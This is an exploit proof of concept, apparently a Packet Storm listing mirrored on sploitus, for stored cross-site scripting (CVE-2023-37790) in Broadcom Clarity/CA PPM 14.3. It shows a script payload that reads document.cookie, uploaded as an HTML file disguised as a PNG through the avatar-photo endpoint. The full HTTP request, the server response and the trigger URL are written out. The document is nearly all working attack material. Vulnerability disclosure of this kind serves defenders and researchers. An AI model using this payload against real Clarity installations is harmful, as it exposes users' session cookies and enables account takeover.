Share
## https://sploitus.com/exploit?id=PACKETSTORM:173508
==================================================================================================================================  
# Title : Insufficient input validation , in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting attacks. |  
# Author : Kaizen |  
# Tested on : windows 10 / browser : Chrome Version 114.0.5735.133 (Official Build) (x86_64) |  
# Vendor : https://www.broadcom.com/   
# Dork : https://www.broadcom.com/products/software/value-stream-management/clarity |  
#Affected Product Version: Clarity PPM 14.3.0.298 / Jaspersoft  
#CVE Assigned: CVE-2023-37790  
==================================================================================================================================  
  
POC:  
  
Header: Content-Type: text/html; charset=utf-8  
  
Payload: <body onload=alert(document.cookie)>  
  
  
HTTP Request:  
POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1  
  
[REDACTED]  
  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo"  
  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png"  
Content-Type: text/html; charset=utf-8  
  
<body onload=alert(document.cookie)>  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="superSecretTokenKey"  
  
superSecretTokenValue  
------WebKitFormBoundaryr7Mas24AkgGJH4HE--  
  
  
HTTP Response:  
  
HTTP/1.1 200 OK  
content-disposition: inline;filename="payload.png"  
Content-Type: text/html;charset=utf-8  
Content-Length: 90  
Date: Thu, 06 Jul 2023 07:33:24 GMT  
Connection: close  
Server: CA PPM  
  
<body onload=alert(document.cookie)>  
  
  
  
To Trigger Stored XSS visit user profile picture.  
  
https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true